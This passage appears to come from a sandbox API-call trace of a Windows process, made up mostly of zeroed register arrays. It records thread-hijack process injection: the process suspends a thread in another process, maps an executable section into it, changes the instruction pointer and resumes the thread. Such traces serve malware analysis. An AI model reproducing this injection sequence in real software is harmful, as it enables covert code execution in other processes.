[183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0158.769] NtResumeThread (in: ThreadHandle=0x104, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0158.769] NtClose (Handle=0x100) returned 0x0 [0158.769] NtClose (Handle=0x104) returned 0x0 [0158.770] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0xbdc, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x104) returned 0x0 [0158.770] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0158.770] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0158.770] NtReadVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0158.770] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0158.782] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0xbe0) | out: ThreadHandle=0x19ea68*=0x100) returned 0x0 [0158.782] NtSuspendThread (in: ThreadHandle=0x100, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0158.782] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0x104, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x23f0000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0158.789] NtGetContextThread (in: ThreadHandle=0x100, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x3cf928, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x3cf8d0, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x3cf8b4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0158.789] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x108) returned 0x0 [0158.789] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x153200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x3160000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x154000) returned 0x0 [0158.798] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0x104, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x153200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x8e0000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x154000) returned 0x0 [0158.826] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x3160000) returned 0x0 [0158.843] NtClose (Handle=0x108) returned 0x0 [0158.844] NtSetContextThread (ThreadHandle=0x100, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x3cf928, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x3cf8d0, Eip=0x9a0707, SegCs=0x23, EFlags=0x246, Esp=0x3cf8b4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0158.844] NtResumeThread (in: ThreadHandle=0x100, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0158.844] NtClose (Handle=0x104) returned 0x0 [0158.844] NtClose (Handle=0x100) returned 0x0 [0158.845] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, 